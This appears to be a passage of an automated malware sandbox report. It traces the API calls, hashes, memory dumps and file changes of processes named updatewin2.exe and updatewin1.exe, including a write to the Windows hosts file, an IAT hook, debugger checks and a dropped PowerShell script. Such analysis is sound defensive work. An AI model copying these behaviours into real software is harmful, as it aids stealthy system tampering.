Integrity Level High (Elevated)
Username XDUWTFONO\5p5NrGJn0jS HALPmcxz
Enabled Privileges SeChangeNotifyPrivilege, SeImpersonatePrivilege, SeCreateGlobalPrivilege
Thread IDs
0x A00
Memory Dumps
»
Name Start VA End VA Dump Reason PE Rebuilds Bitness Entry Points YARA Actions
buffer 0x004E5000 0x004E5FFF Marked Executable - 32-bit - False
...
updatewin2.exe 0x00400000 0x0044CFFF Forced - 32-bit - False
...
updatewin2.exe 0x00400000 0x0044CFFF Process Termination - 32-bit - False
...
Modified Files
»
Filename File Size Hash Values YARA Match Actions
C:\Windows\System32\drivers\etc\hosts 7.92 KB MD5: 360d265eddea8679c434a205f7ade7ad
SHA1: e17d843f610e0283904e201195360525ae449a68
SHA256: 5a1597c0d29dd475e33cd8889d7d848037a8c17bad0f3daa022fb889e0db7ead
SSDeep: 96:vDZEurK9q3WlSyU0FXmGZll0TOHyF9fAHLmttA/ZKTKdIlMHqzoCGbXx:RrK9FU0FXmGZll06m9fAH6AhKTK9Cax 		False
...
Threads
Thread 0xa00
654 0
»
Category Operation Information Success Count Logfile
System Get Time type = System Time, time = 2019-03-24 16:36:36 (UTC) True 1
Fn
System Get Time type = Ticks, time = 119434 True 1
Fn
System Get Time type = Performance Ctr, time = 18165961372 True 1
Fn
Module Get Handle module_name = c:\windows\syswow64\kernel32.dll, base_address = 0x76c20000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = FlsAlloc, address_out = 0x76c34f2b True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = FlsGetValue, address_out = 0x76c31252 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = FlsSetValue, address_out = 0x76c34208 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = FlsFree, address_out = 0x76c3359f True 1
Fn
Module Get Handle module_name = c:\windows\syswow64\kernel32.dll, base_address = 0x76c20000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = EncodePointer, address_out = 0x77170fcb True 1
Fn
Module Get Handle module_name = c:\windows\syswow64\kernel32.dll, base_address = 0x76c20000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = EncodePointer, address_out = 0x77170fcb True 1
Fn
Module Get Handle module_name = c:\windows\syswow64\kernel32.dll, base_address = 0x76c20000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = EncodePointer, address_out = 0x77170fcb True 1
Fn
Module Get Handle module_name = c:\windows\syswow64\kernel32.dll, base_address = 0x76c20000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = EncodePointer, address_out = 0x77170fcb True 1
Fn
Module Get Handle module_name = c:\windows\syswow64\kernel32.dll, base_address = 0x76c20000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = EncodePointer, address_out = 0x77170fcb True 1
Fn
Module Get Handle module_name = c:\windows\syswow64\kernel32.dll, base_address = 0x76c20000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = EncodePointer, address_out = 0x77170fcb True 1
Fn
Module Get Handle module_name = c:\windows\syswow64\kernel32.dll, base_address = 0x76c20000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = EncodePointer, address_out = 0x77170fcb True 1
Fn
Module Get Handle module_name = c:\windows\syswow64\kernel32.dll, base_address = 0x76c20000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = DecodePointer, address_out = 0x77169d35 True 1
Fn
Module Get Handle module_name = c:\windows\syswow64\kernel32.dll, base_address = 0x76c20000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = DecodePointer, address_out = 0x77169d35 True 1
Fn
Module Get Handle module_name = c:\windows\syswow64\kernel32.dll, base_address = 0x76c20000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = EncodePointer, address_out = 0x77170fcb True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = DecodePointer, address_out = 0x77169d35 True 1
Fn
File Open filename = STD_INPUT_HANDLE True 1
Fn
File Open filename = STD_OUTPUT_HANDLE True 1
Fn
File Open filename = STD_ERROR_HANDLE True 1
Fn
Environment Get Environment String - True 1
Fn
Data
Module Get Filename process_name = c:\users\5p5nrgjn0js halpmcxz\appdata\local\31d598d6-7a99-49f9-bbea-5545d7a59a7d\updatewin2.exe, file_name_orig = C:\Users\5p5NrGJn0jS HALPmcxz\AppData\Local\31d598d6-7a99-49f9-bbea-5545d7a59a7d\updatewin2.exe, size = 260 True 1
Fn
Module Load module_name = kernel32.dll, base_address = 0x76c20000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = CreateToolhelp32Snapshot, address_out = 0x76c5735f True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = Module32FirstW, address_out = 0x76c579f9 True 1
Fn
System Get Time type = Ticks, time = 119527 True 1
Fn
System Get Time type = System Time True 1
Fn
System Get Time type = System Time True 1
Fn
System Get Time type = System Time True 1
Fn
System Get Time type = System Time True 1
Fn
System Get Time type = System Time True 1
Fn
System Get Time type = System Time True 1
Fn
System Get Time type = System Time True 1
Fn
System Get Time type = System Time True 1
Fn
System Get Time type = System Time True 1
Fn
System Get Time type = System Time True 1
Fn
System Get Time type = System Time True 1
Fn
System Get Time type = System Time True 1
Fn
System Get Time type = System Time True 1
Fn
System Get Time type = System Time True 1
Fn
System Get Time type = System Time True 1
Fn
System Get Time type = System Time True 1
Fn
System Get Time type = System Time True 1
Fn
System Get Time type = System Time True 1
Fn
System Get Time type = System Time True 1
Fn
System Get Time type = System Time True 1
Fn
System Get Time type = System Time True 1
Fn
System Get Time type = System Time True 1
Fn
System Get Time type = System Time True 1
Fn
System Get Time type = System Time True 1
Fn
System Get Time type = System Time True 1
Fn
System Get Time type = System Time True 1
Fn
System Get Time type = System Time True 1
Fn
System Get Time type = System Time True 1
Fn
System Get Time type = System Time True 1
Fn
System Get Time type = System Time True 1
Fn
System Get Time type = System Time True 1
Fn
System Get Time type = System Time True 1
Fn
System Get Time type = System Time True 1
Fn
System Get Time type = System Time True 1
Fn
System Get Time type = System Time True 1
Fn
System Get Time type = System Time True 1
Fn
System Get Time type = System Time True 1
Fn
System Get Time type = System Time True 1
Fn
System Get Time type = System Time True 1
Fn
System Get Time type = System Time True 1
Fn
System Get Time type = System Time True 1
Fn
System Get Time type = System Time True 1
Fn
System Get Time type = System Time True 1
Fn
System Get Time type = System Time True 1
Fn
System Get Time type = System Time True 1
Fn
System Get Time type = System Time True 1
Fn
System Get Time type = System Time True 1
Fn
System Get Time type = System Time True 1
Fn
System Get Time type = System Time True 1
Fn
System Get Time type = System Time True 1
Fn
System Get Time type = System Time True 1
Fn
System Get Time type = System Time True 1
Fn
System Get Time type = System Time True 1
Fn
System Get Time type = System Time True 1
Fn
System Get Time type = System Time True 1
Fn
System Get Time type = System Time True 1
Fn
System Get Time type = System Time True 1
Fn
System Get Time type = System Time True 1
Fn
System Get Time type = System Time True 1
Fn
System Get Time type = System Time True 1
Fn
System Get Time type = System Time True 1
Fn
System Get Time type = System Time True 1
Fn
System Get Time type = System Time True 1
Fn
System Get Time type = System Time True 1
Fn
System Get Time type = System Time True 1
Fn
System Get Time type = System Time True 1
Fn
System Get Time type = System Time True 1
Fn
System Get Time type = System Time True 1
Fn
System Get Time type = System Time True 1
Fn
System Get Time type = System Time True 1
Fn
System Get Time type = System Time True 1
Fn
System Get Time type = System Time True 1
Fn
System Get Time type = System Time True 1
Fn
System Get Time type = System Time True 1
Fn
System Get Time type = System Time True 1
Fn
System Get Time type = System Time True 1
Fn
System Get Time type = System Time True 1
Fn
System Get Time type = System Time True 1
Fn
System Get Time type = System Time True 1
Fn
System Get Time type = System Time True 1
Fn
System Get Time type = System Time True 1
Fn
System Get Time type = System Time True 1
Fn
System Get Time type = System Time True 1
Fn
System Get Time type = System Time True 1
Fn
System Get Time type = System Time True 1
Fn
System Get Time type = System Time True 1
Fn
System Get Time type = System Time True 1
Fn
System Get Time type = System Time True 1
Fn
System Get Time type = System Time True 1
Fn
System Get Time type = System Time True 1
Fn
System Get Time type = System Time True 1
Fn
System Get Time type = System Time True 1
Fn
System Get Time type = System Time True 1
Fn
System Get Time type = System Time True 1
Fn
System Get Time type = System Time True 1
Fn
System Get Time type = System Time True 1
Fn
System Get Time type = System Time True 1
Fn
System Get Time type = System Time True 1
Fn
System Get Time type = System Time True 1
Fn
System Get Time type = System Time True 1
Fn
System Get Time type = System Time True 1
Fn
System Get Time type = System Time True 1
Fn
System Get Time type = System Time True 1
Fn
System Get Time type = System Time True 1
Fn
System Get Time type = System Time True 1
Fn
System Get Time type = System Time True 1
Fn
System Get Time type = System Time True 1
Fn
System Get Time type = System Time True 1
Fn
System Get Time type = System Time True 1
Fn
System Get Time type = System Time True 1
Fn
System Get Time type = System Time True 1
Fn
System Get Time type = System Time True 1
Fn
System Get Time type = System Time True 1
Fn
System Get Time type = System Time True 1
Fn
System Get Time type = System Time True 1
Fn
System Get Time type = System Time True 1
Fn
System Get Time type = System Time True 1
Fn
System Get Time type = System Time True 1
Fn
System Get Time type = System Time True 1
Fn
System Get Time type = System Time True 1
Fn
System Get Time type = System Time True 1
Fn
System Get Time type = System Time True 1
Fn
System Get Time type = System Time True 1
Fn
System Get Time type = System Time True 1
Fn
System Get Time type = System Time True 1
Fn
System Get Time type = System Time True 1
Fn
System Get Time type = System Time True 1
Fn
System Get Time type = System Time True 1
Fn
System Get Time type = System Time True 1
Fn
System Get Time type = System Time True 1
Fn
System Get Time type = System Time True 1
Fn
System Get Time type = System Time True 1
Fn
System Get Time type = System Time True 1
Fn
System Get Time type = System Time True 1
Fn
System Get Time type = System Time True 1
Fn
System Get Time type = System Time True 1
Fn
System Get Time type = System Time True 1
Fn
System Get Time type = System Time True 1
Fn
System Get Time type = System Time True 1
Fn
System Get Time type = System Time True 1
Fn
System Get Time type = System Time True 1
Fn
System Get Time type = System Time True 1
Fn
System Get Time type = System Time True 1
Fn
System Get Time type = System Time True 1
Fn
System Get Time type = System Time True 1
Fn
System Get Time type = System Time True 1
Fn
System Get Time type = System Time True 1
Fn
System Get Time type = System Time True 1
Fn
System Get Time type = System Time True 1
Fn
System Get Time type = System Time True 1
Fn
System Get Time type = System Time True 1
Fn
System Get Time type = System Time True 1
Fn
System Get Time type = System Time True 1
Fn
System Get Time type = System Time True 1
Fn
System Get Time type = System Time True 1
Fn
System Get Time type = System Time True 1
Fn
System Get Time type = System Time True 1
Fn
System Get Time type = System Time True 1
Fn
System Get Time type = System Time True 1
Fn
System Get Time type = System Time True 1
Fn
System Get Time type = System Time True 1
Fn
System Get Time type = System Time True 1
Fn
System Get Time type = System Time True 1
Fn
System Get Time type = System Time True 1
Fn
System Get Time type = System Time True 1
Fn
System Get Time type = System Time True 1
Fn
System Get Time type = System Time True 1
Fn
System Get Time type = System Time True 1
Fn
System Get Time type = System Time True 1
Fn
System Get Time type = System Time True 1
Fn
System Get Time type = System Time True 1
Fn
System Get Time type = System Time True 1
Fn
System Get Time type = System Time True 1
Fn
System Get Time type = System Time True 1
Fn
System Get Time type = System Time True 1
Fn
System Get Time type = System Time True 1
Fn
System Get Time type = System Time True 1
Fn
System Get Time type = System Time True 1
Fn
System Get Time type = System Time True 1
Fn
System Get Time type = System Time True 1
Fn
System Get Time type = System Time True 1
Fn
System Get Time type = System Time True 1
Fn
System Get Time type = System Time True 1
Fn
System Get Time type = System Time True 1
Fn
System Get Time type = System Time True 1
Fn
System Get Time type = System Time True 1
Fn
System Get Time type = System Time True 1
Fn
System Get Time type = System Time True 1
Fn
System Get Time type = System Time True 1
Fn
System Get Time type = System Time True 1
Fn
System Get Time type = System Time True 1
Fn
System Get Time type = System Time True 1
Fn
System Get Time type = System Time True 1
Fn
System Get Time type = System Time True 1
Fn
System Get Time type = System Time True 1
Fn
System Get Time type = System Time True 1
Fn
System Get Time type = System Time True 1
Fn
System Get Time type = System Time True 1
Fn
System Get Time type = System Time True 1
Fn
System Get Time type = System Time True 1
Fn
System Get Time type = System Time True 1
Fn
System Get Time type = System Time True 1
Fn
System Get Time type = System Time True 1
Fn
System Get Time type = System Time True 1
Fn
System Get Time type = System Time True 1
Fn
System Get Time type = System Time True 1
Fn
System Get Time type = System Time True 1
Fn
System Get Time type = System Time True 1
Fn
System Get Time type = System Time True 1
Fn
System Get Time type = System Time True 1
Fn
System Get Time type = System Time True 1
Fn
System Get Time type = System Time True 1
Fn
System Get Time type = System Time True 1
Fn
System Get Time type = System Time True 1
Fn
System Get Time type = System Time True 1
Fn
System Get Time type = System Time True 1
Fn
System Get Time type = System Time True 1
Fn
System Get Time type = System Time True 1
Fn
System Get Time type = System Time True 1
Fn
System Get Time type = System Time True 1
Fn
System Get Time type = System Time True 1
Fn
System Get Time type = System Time True 1
Fn
System Get Time type = System Time True 1
Fn
System Get Time type = System Time True 1
Fn
System Get Time type = System Time True 1
Fn
System Get Time type = System Time True 1
Fn
System Get Time type = System Time True 1
Fn
System Get Time type = System Time True 1
Fn
System Get Time type = System Time True 1
Fn
System Get Time type = System Time True 1
Fn
System Get Time type = System Time True 1
Fn
System Get Time type = System Time True 1
Fn
System Get Time type = System Time True 1
Fn
System Get Time type = System Time True 1
Fn
System Get Time type = System Time True 1
Fn
System Get Time type = System Time True 1
Fn
System Get Time type = System Time True 1
Fn
System Get Time type = System Time True 1
Fn
System Get Time type = System Time True 1
Fn
System Get Time type = System Time True 1
Fn
System Get Time type = System Time True 1
Fn
System Get Time type = System Time True 1
Fn
System Get Time type = System Time True 1
Fn
System Get Time type = System Time True 1
Fn
System Get Time type = System Time True 1
Fn
System Get Time type = System Time True 1
Fn
System Get Time type = System Time True 1
Fn
System Get Time type = System Time True 1
Fn
System Get Time type = System Time True 1
Fn
Module Load module_name = kernel32.dll, base_address = 0x76c20000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = VirtualAlloc, address_out = 0x76c31856 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = VirtualProtect, address_out = 0x76c3435f True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = VirtualFree, address_out = 0x76c3186e True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = GetVersionExA, address_out = 0x76c33519 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = TerminateProcess, address_out = 0x76c4d802 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = ExitProcess, address_out = 0x76c37a10 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = SetErrorMode, address_out = 0x76c31b00 True 1
Fn
System Get Info type = Operating System True 1
Fn
Module Load module_name = KERNEL32.dll, base_address = 0x76c20000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = CreateFileW, address_out = 0x76c33f5c True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = GetFileSize, address_out = 0x76c3196e True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = SetFilePointer, address_out = 0x76c317d1 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = WriteFile, address_out = 0x76c31282 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = CloseHandle, address_out = 0x76c31410 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = WriteConsoleW, address_out = 0x76c57aca True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = SetFilePointerEx, address_out = 0x76c4c807 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = GetConsoleMode, address_out = 0x76c31328 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = GetConsoleCP, address_out = 0x76cd7bff True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = FlushFileBuffers, address_out = 0x76c3469b True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = HeapReAlloc, address_out = 0x77171f6e True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = HeapSize, address_out = 0x77163002 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = GetProcessHeap, address_out = 0x76c314e9 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = LCMapStringW, address_out = 0x76c317b9 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = GetStringTypeW, address_out = 0x76c31946 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = GetFileType, address_out = 0x76c33531 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = SetStdHandle, address_out = 0x76cb454f True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = FreeEnvironmentStringsW, address_out = 0x76c351cb True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = GetEnvironmentStringsW, address_out = 0x76c351e3 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = UnhandledExceptionFilter, address_out = 0x76c5772f True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = SetUnhandledExceptionFilter, address_out = 0x76c387c9 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = GetCurrentProcess, address_out = 0x76c31809 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = TerminateProcess, address_out = 0x76c4d802 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = IsProcessorFeaturePresent, address_out = 0x76c35235 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = QueryPerformanceCounter, address_out = 0x76c31725 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = GetCurrentProcessId, address_out = 0x76c311f8 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = GetCurrentThreadId, address_out = 0x76c31450 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = GetSystemTimeAsFileTime, address_out = 0x76c33509 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = InitializeSListHead, address_out = 0x771694a4 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = IsDebuggerPresent, address_out = 0x76c34a5d True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = GetStartupInfoW, address_out = 0x76c34d40 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = GetModuleHandleW, address_out = 0x76c334b0 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = RtlUnwind, address_out = 0x76c5d1c3 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = RaiseException, address_out = 0x76c358a6 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = GetLastError, address_out = 0x76c311c0 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = SetLastError, address_out = 0x76c311a9 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = EncodePointer, address_out = 0x77170fcb True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = EnterCriticalSection, address_out = 0x771522b0 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = LeaveCriticalSection, address_out = 0x77152270 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = DeleteCriticalSection, address_out = 0x771645f5 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = InitializeCriticalSectionAndSpinCount, address_out = 0x76c31916 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = TlsAlloc, address_out = 0x76c349ad True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = TlsGetValue, address_out = 0x76c311e0 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = TlsSetValue, address_out = 0x76c314fb True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = TlsFree, address_out = 0x76c33587 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = FreeLibrary, address_out = 0x76c334c8 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = GetProcAddress, address_out = 0x76c31222 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = LoadLibraryExW, address_out = 0x76c3495d True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = GetStdHandle, address_out = 0x76c351b3 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = GetModuleFileNameW, address_out = 0x76c34950 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = MultiByteToWideChar, address_out = 0x76c3192e True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = WideCharToMultiByte, address_out = 0x76c3170d True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = ExitProcess, address_out = 0x76c37a10 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = GetModuleHandleExW, address_out = 0x76c34a6f True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = GetACP, address_out = 0x76c3179c True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = HeapAlloc, address_out = 0x7715e026 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = HeapFree, address_out = 0x76c314c9 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = FindClose, address_out = 0x76c34442 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = FindFirstFileExW, address_out = 0x76c41811 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = FindNextFileW, address_out = 0x76c354ee True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = IsValidCodePage, address_out = 0x76c34493 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = GetOEMCP, address_out = 0x76c5d1a1 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = GetCPInfo, address_out = 0x76c35189 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = GetCommandLineA, address_out = 0x76c351a1 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = GetCommandLineW, address_out = 0x76c35223 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = DecodePointer, address_out = 0x77169d35 True 1
Fn
Module Load module_name = USER32.dll, base_address = 0x74f40000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\user32.dll, function = MessageBoxA, address_out = 0x74fafd1e True 1
Fn
Module Load module_name = SHELL32.dll, base_address = 0x75fd0000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\shell32.dll, function = SHGetFolderPathW, address_out = 0x76055708 True 1
Fn
Module Load module_name = SHLWAPI.dll, base_address = 0x75340000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\shlwapi.dll, function = PathAppendW, address_out = 0x753581ef True 1
Fn
Module Load module_name = msvcr100.dll, base_address = 0x749c0000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\msvcr100.dll, function = atexit, address_out = 0x749dc544 True 1
Fn
System Get Time type = System Time, time = 2019-03-24 16:36:37 (UTC) True 1
Fn
System Get Time type = Performance Ctr, time = 18233617619 True 1
Fn
Module Load module_name = api-ms-win-core-synch-l1-2-0, base_address = 0x0 False 1
Fn
Module Load module_name = kernel32, base_address = 0x0 False 1
Fn
Module Load module_name = kernel32, base_address = 0x76c20000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = InitializeCriticalSectionEx, address_out = 0x76c34d28 True 1
Fn
Module Load module_name = api-ms-win-core-fibers-l1-1-1, base_address = 0x0 False 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = FlsAlloc, address_out = 0x76c34f2b True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = FlsSetValue, address_out = 0x76c34208 True 1
Fn
Module Load module_name = api-ms-win-core-synch-l1-2-0, base_address = 0x0 False 1
Fn
Module Load module_name = kernel32, base_address = 0x0 False 1
Fn
Module Load module_name = kernel32, base_address = 0x76c20000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = InitializeCriticalSectionEx, address_out = 0x76c34d28 True 1
Fn
Module Load module_name = api-ms-win-core-fibers-l1-1-1, base_address = 0x0 False 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = FlsAlloc, address_out = 0x76c34f2b True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = FlsGetValue, address_out = 0x76c31252 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = FlsSetValue, address_out = 0x76c34208 True 1
Fn
File Open filename = STD_INPUT_HANDLE True 1
Fn
File Open filename = STD_OUTPUT_HANDLE True 1
Fn
File Open filename = STD_ERROR_HANDLE True 1
Fn
Module Load module_name = api-ms-win-core-localization-l1-2-1, base_address = 0x0 False 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = LCMapStringEx, address_out = 0x76cb47f1 True 1
Fn
Module Get Filename module_name = api-ms-win-core-localization-l1-2-1, process_name = c:\users\5p5nrgjn0js halpmcxz\appdata\local\31d598d6-7a99-49f9-bbea-5545d7a59a7d\updatewin2.exe, file_name_orig = C:\Users\5p5NrGJn0jS HALPmcxz\AppData\Local\31d598d6-7a99-49f9-bbea-5545d7a59a7d\updatewin2.exe, size = 260 True 1
Fn
Environment Get Environment String - True 1
Fn
Data
File Create filename = C:\Windows\System32\drivers\etc\hosts, desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ True 1
Fn
File Get Info filename = C:\Windows\System32\drivers\etc\hosts, type = size True 1
Fn
File Write filename = C:\Windows\System32\drivers\etc\hosts, size = 7286 True 1
Fn
Data
Module Get Handle module_name = c:\users\5p5nrgjn0js halpmcxz\appdata\local\31d598d6-7a99-49f9-bbea-5545d7a59a7d\updatewin2.exe, base_address = 0x400000 True 2
Fn
Module Load module_name = api-ms-win-appmodel-runtime-l1-1-2, base_address = 0x0 False 1
Fn
Module Get Handle module_name = mscoree.dll False 1
Fn
Process #10: updatewin1.exe
671 0
»
Information Value
ID #10
File Name c:\users\5p5nrgjn0js halpmcxz\appdata\local\31d598d6-7a99-49f9-bbea-5545d7a59a7d\updatewin1.exe
Command Line "C:\Users\5p5NrGJn0jS HALPmcxz\AppData\Local\31d598d6-7a99-49f9-bbea-5545d7a59a7d\updatewin1.exe" --Admin
Initial Working Directory C:\Users\5p5NrGJn0jS HALPmcxz\AppData\Local\31d598d6-7a99-49f9-bbea-5545d7a59a7d\
Monitor Start Time: 00:01:01, Reason: Child Process
Unmonitor End Time: 00:01:17, Reason: Self Terminated
Monitor Duration 00:00:15
OS Process Information
»
Information Value
PID 0xa0c
Parent PID 0x9ec (c:\users\5p5nrgjn0js halpmcxz\appdata\local\31d598d6-7a99-49f9-bbea-5545d7a59a7d\updatewin1.exe)
Bitness 32-bit
Is Created or Modified Executable True
Integrity Level High (Elevated)
Username XDUWTFONO\5p5NrGJn0jS HALPmcxz
Enabled Privileges SeChangeNotifyPrivilege, SeImpersonatePrivilege, SeCreateGlobalPrivilege
Thread IDs
0x A10
Memory Dumps
»
Name Start VA End VA Dump Reason PE Rebuilds Bitness Entry Points YARA Actions
buffer 0x005A5000 0x005A5FFF Marked Executable - 32-bit - False
...
updatewin1.exe 0x00400000 0x0044CFFF Forced - 32-bit - False
...
Hook Information
»
Type Installer Target Size Information Actions
IAT private_0x0000000000590000:+0x1679d 104. entry of updatewin1.exe 4 bytes kernel32.dll:GetConsoleCP+0x0 now points to pagefile_0x0000000000b40000:+0x42f6f6
...
Dropped Files
»
Filename File Size Hash Values YARA Match Actions
C:\Users\5p5NrGJn0jS HALPmcxz\AppData\Local\script.ps1 0.05 KB MD5: f972c62f986b5ed49ad7713d93bf6c9f
SHA1: 4e157002bdb97e9526ab97bfafbf7c67e1d1efbf
SHA256: b47f85974a7ec2fd5aa82d52f08eb0f6cea7e596a98dd29e8b85b5c37beca0a8
SSDeep: 3:uIHeGAFcX5wTnl:/eGgHTl 		False
...
Threads
Thread 0xa10
671 0
»
Category Operation Information Success Count Logfile
System Get Time type = System Time, time = 2019-03-24 16:36:37 (UTC) True 1
Fn
System Get Time type = Ticks, time = 119777 True 1
Fn
System Get Time type = Performance Ctr, time = 18199941480 True 1
Fn
Module Get Handle module_name = c:\windows\syswow64\kernel32.dll, base_address = 0x76c20000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = FlsAlloc, address_out = 0x76c34f2b True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = FlsGetValue, address_out = 0x76c31252 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = FlsSetValue, address_out = 0x76c34208 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = FlsFree, address_out = 0x76c3359f True 1
Fn
Module Get Handle module_name = c:\windows\syswow64\kernel32.dll, base_address = 0x76c20000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = EncodePointer, address_out = 0x77170fcb True 1
Fn
